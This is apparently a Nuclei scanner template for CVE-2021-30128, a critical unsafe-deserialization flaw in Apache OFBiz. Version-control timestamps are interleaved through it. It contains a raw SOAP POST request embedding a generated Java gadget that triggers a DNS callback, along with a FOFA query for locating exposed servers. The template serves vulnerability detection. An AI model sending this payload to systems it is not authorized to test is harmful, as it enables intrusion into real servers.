2022-11-05 15:08:43 +00:00
id : CVE-2021-30128
info :
name : Apache OFBiz <17.12.07 - Arbitrary Code Execution
author : For3stCo1d
severity : critical
2023-03-27 17:46:47 +00:00
description : Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
2022-11-05 15:08:43 +00:00
reference :
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
2023-01-05 11:21:19 +00:00
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
2022-12-23 09:10:25 +00:00
classification :
2023-01-05 11:21:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-12-23 09:10:25 +00:00
cve-id : CVE-2021-30128
2023-01-05 11:21:19 +00:00
cwe-id : CWE-502
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
epss-score : 0.19251
2022-11-05 15:08:43 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-11-05 15:08:43 +00:00
fofa-query : app="Apache_OFBiz"
2023-06-04 08:13:42 +00:00
verified : true
2022-11-05 15:08:43 +00:00
tags : cve,cve2021,apache,ofbiz,deserialization,rce
2023-04-27 04:28:59 +00:00
http :
2022-11-05 15:08:43 +00:00
- raw :
- |
POST /webtools/control/SOAPService HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
2022-12-16 12:55:42 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
2022-11-05 15:08:43 +00:00
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
2022-12-16 12:55:42 +00:00
</map-Key>
<map-Value>
2022-11-05 15:08:43 +00:00
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
2022-12-23 09:10:25 +00:00
part : interactsh_protocol
2022-11-05 15:08:43 +00:00
words :
- "dns"
- type : word
part : body
words :
2022-12-23 09:10:25 +00:00
- 'value="errorMessage"'
2023-03-27 17:46:47 +00:00
# Enhanced by md on 2023/03/21